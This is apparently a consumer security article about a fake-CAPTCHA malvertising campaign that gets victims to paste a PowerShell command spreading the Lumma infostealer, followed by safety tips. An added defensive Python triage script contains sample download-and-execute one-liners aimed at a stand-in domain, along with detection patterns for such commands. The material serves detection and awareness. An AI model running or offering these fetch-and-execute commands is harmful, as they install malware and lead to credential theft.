When you visit a website, you may see a CAPTCHA to make sure you are a real person and not a robot. It’s usually jumbled words, some recognizable images, or just a box that says, “I’m not a robot.”
Real CAPTCHAs are harmless, but attackers are now imitating them to trick you into infecting your own PC with malware.
Security researchers have found a huge fake CAPTCHA campaign spreading the Lumma information-stealing malware. It slips past browser protections such as Safe Browsing because the browser never downloads a malicious file: the victim is talked into running the malicious command themselves.
This campaign shows how malvertising works at scale: over a million ad impressions every day across a network of more than 3,000 sites, and thousands of victims losing their accounts and money. I will explain how this scam works, who is responsible, and how you can protect yourself.
How does the scam work?
As reported by Guardio, the fake CAPTCHA scam is a sophisticated malvertising campaign that gets you to install malware yourself under the guise of a routine CAPTCHA verification. The attack begins when you browse websites, often those that offer free streaming, downloads or pirated content. Ads served on these sites redirect you to what appears to be a legitimate CAPTCHA verification page.
The page imitates a real CAPTCHA and asks you to confirm that you are human. The "verification steps" it shows, however, are instructions to open the Windows Run dialog (Win+R), paste (Ctrl+V) and press Enter. The page has already placed a crafted PowerShell command on your clipboard, so following the steps silently downloads and installs the Lumma information-stealing malware on your system.
The malware targets sensitive data, including social media accounts, banking credentials, saved passwords, and personal files, which could lead to identity and financial theft.
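As an added example (not from the article or from Guardio's report), here is a Python triage script a defender could run over process-creation records and an export of the Run dialog history to spot the "paste this into Run" pattern described above. The Run dialog launches its command as a child of explorer.exe, and every command typed into it is stored in the RunMRU registry key, so both are natural places to look after a suspected incident. Everything in the script is constructed for illustration: the event records, the registry export text and the `.invalid` domain; the indicator list is a general heuristic for download-and-execute one-liners, not a signature for this specific campaign.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Indicators typical of a one-liner that fetches a second stage and runs it in memory.
# Heuristic only: each one also appears in legitimate administration.
INDICATORS: dict[str, re.Pattern[str]] = {
    "hidden_window": re.compile(r"-(w|win|windowstyle)\s+h(idden)?\b", re.I),
    "exec_policy_bypass": re.compile(r"-(ep|executionpolicy)\s+bypass\b", re.I),
    "encoded_command": re.compile(r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_cradle": re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|curl|wget)\b", re.I),
    "in_memory_exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "mshta_remote": re.compile(r"\bmshta(\.exe)?\s+https?://", re.I),
}

# Scripting hosts a Run-dialog one-liner typically starts.
LAUNCHERS = ("powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe")


@dataclass
class ProcEvent:
    """One process-creation record (Sysmon event 1 / Security 4688 style)."""
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def indicators_in(command_line: str) -> list[str]:
    """Names of the indicators present in a command line, in table order."""
    return [name for name, rx in INDICATORS.items() if rx.search(command_line)]


def triage_process(ev: ProcEvent) -> dict | None:
    """Flag a scripting host started by explorer.exe (what Win+R produces) whose
    command line carries download-and-execute indicators. explorer.exe also parents
    shells opened from the Start menu, so the indicator check is what separates
    those from a pasted one-liner."""
    if _basename(ev.parent_image) != "explorer.exe":
        return None
    if _basename(ev.image) not in LAUNCHERS:
        return None
    hits = indicators_in(ev.command_line)
    if not hits:
        return None
    return {"image": _basename(ev.image), "indicators": hits, "command_line": ev.command_line}


def triage_events(events: list[ProcEvent]) -> list[dict]:
    return [f for f in (triage_process(e) for e in events) if f]


RUNMRU_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
_REG_STRING = re.compile(r'^"([^"]+)"="((?:[^"\\]|\\.)*)"$')


def parse_runmru(reg_export: str) -> list[str]:
    """Return the Run dialog history from a `reg export` text dump, most recent
    first. Each entry is a REG_SZ ending in a literal backslash-1; "MRUList" holds
    the value names in recency order."""
    entries: dict[str, str] = {}
    mru_order = ""
    in_key = False
    for line in reg_export.splitlines():
        line = line.strip()
        if line.startswith("["):
            in_key = line == f"[{RUNMRU_KEY}]"
            continue
        m = _REG_STRING.match(line) if in_key else None
        if not m:
            continue
        name, raw = m.groups()
        value = re.sub(r"\\(.)", r"\1", raw)  # undo .reg escaping of backslash and quote
        if name == "MRUList":
            mru_order = value
        else:
            entries[name] = value[:-2] if value.endswith("\\1") else value
    ordered = [entries[k] for k in mru_order if k in entries]
    ordered += [v for k, v in entries.items() if k not in mru_order]
    return ordered


def triage_runmru(reg_export: str) -> list[dict]:
    """Run dialog history entries that carry download-and-execute indicators."""
    return [{"entry": e, "indicators": h} for e in parse_runmru(reg_export) if (h := indicators_in(e))]


# Constructed samples for this example; the domain is a reserved .invalid name.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -w hidden -ep bypass -c "iex (irm https://captcha-verify.invalid/v.txt)"'),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell"),  # shell opened from the Start menu: no indicators, not flagged
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\mshta.exe",
              "mshta https://captcha-verify.invalid/x.hta"),  # not launched via Run: outside this check's scope
]

SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"a"="notepad\\1"
"b"="powershell -w hidden -ep bypass -c \"iex (irm https://captcha-verify.invalid/v.txt)\"\\1"
"MRUList"="ba"
'''

if __name__ == "__main__":
    for f in triage_events(SAMPLE_EVENTS):
        print("process:", f["image"], f["indicators"])
    for f in triage_runmru(SAMPLE_REG):
        print("RunMRU:", f["indicators"], f["entry"])
```

On a real host the registry text comes from `reg export "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" runmru.reg` (the file is UTF-16; decode it before passing it in), and the process records from whatever endpoint telemetry is available. The RunMRU check is the cheaper of the two: it needs no logging to have been enabled beforehand, although a user who clears the dialog history or a stealer that does so will empty it.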
Who is to blame for this?
The fake CAPTCHA scam shows how broken the Internet advertising system has become, with everyone involved passing the buck. Guardio Labs points to ad networks like Monetag as a big part of the problem. They distribute malicious ads that are disguised during moderation using tricks such as cloaking, where the ad shows harmless content to reviewers and the malicious redirect only to ordinary visitors. Publishers, especially those offering free or pirated content, compound the problem by running these ads on their sites, often without verifying what they are actually showing users.
Then there are services like BeMob, whose tracking links let scammers hide the real destination behind a harmless-looking URL. These companies call themselves analytics tools, but in practice they help scams stay hidden. Hosting providers do not escape blame either: the fake CAPTCHA pages live on their servers, and they often do not check what is being hosted.
Of course, the scammers themselves are the ones pulling the strings. But because they spread their operations across so many platforms, it is almost impossible to track them. Guardio’s research shows how all of these moving parts work together, creating a system where no one takes responsibility and the scams continue.
6 Ways to Stay Safe from Fake CAPTCHAs
1. Use reliable security software: Keeping your antivirus and anti-malware software up to date is one of the most effective ways to protect yourself from fake CAPTCHA scams. Powerful antivirus software will detect and block malware like the Lumma infostealer before it can infect your device. Get my picks for the best antivirus protection winners of 2024 for your Windows, Mac, Android, and iOS devices.
2. Enable browser protection features: Modern browsers offer built-in security features, such as safe browsing and phishing protection, that warn you about known dangerous sites. Make sure these features are enabled in your browser settings. They are a useful layer, but not a complete one: this campaign works precisely because the browser never downloads anything for these tools to block, so do not treat a missing warning as proof that a page is safe.
3. Be careful with “free” content: There is a saying that goes: “If something is free, you are what they sell.” Websites that offer free downloads, streaming services, or pirated content are often associated with malvertising campaigns. Fake CAPTCHA scams are commonly spread through these types of sites, where users are tricked into clicking on malicious ads or links. Even if a site looks tempting, it’s important to be careful. Avoid clicking on suspicious links or using “free” services, as these could be traps designed to infect your device with malware.
4. Avoid clicking on suspicious ads: Always be wary of ads that appear out of nowhere or that seem too good to be true. Fake CAPTCHA scams often disguise themselves as legitimate ads and ask you to click to verify that you are human. Never interact with pop-up ads or unknown banners, especially those that claim to offer you something for free, as they may lead to malicious pages or cause malware downloads.
5. Check the page, not just the padlock: A genuine CAPTCHA only asks you to tick a box, pick images or type characters inside the web page. It never asks you to open the Windows Run dialog, press Win+R, paste a command, or run anything outside the browser. If a "verification" page does, close it; no legitimate check works that way. HTTPS alone is not a sign of safety: "https://" in the address bar only means the connection is encrypted, and a fake CAPTCHA page can be served over HTTPS like any other site. A polished design is no guarantee either, since these pages copy the real CAPTCHA look closely. If anything about a verification step seems off, trust your instincts and leave the site.
6. Enable two-factor authentication: Two-factor authentication adds an extra layer of security, making it difficult for attackers to log in with a stolen password alone. It will not undo an infection, though: if you have pasted a command from a "verification" page, treat every password saved on that PC as compromised, run a full malware scan, change your passwords from a clean device, and sign out of all active sessions on your important accounts.
Kurt’s Key Takeaway
There is no doubt that fake CAPTCHA scams are a growing threat, putting millions of us at risk of malware infections and financial loss. What’s even more worrying is that ad networks, publishers, and hosting services continue to allow malicious campaigns to spread across their platforms despite widespread awareness of the issue. The companies involved should take immediate steps to improve content moderation, strengthen security measures, and prevent these scams from thriving. We are seeing a dangerous loophole in the digital advertising ecosystem that could have serious consequences for internet users.
Do you think ad networks and publishers should be responsible for the spread of malware across their platforms? Let us know by writing to us at Cyberguy.com/Contact.
Copyright 2024 CyberGuy.com. All rights reserved.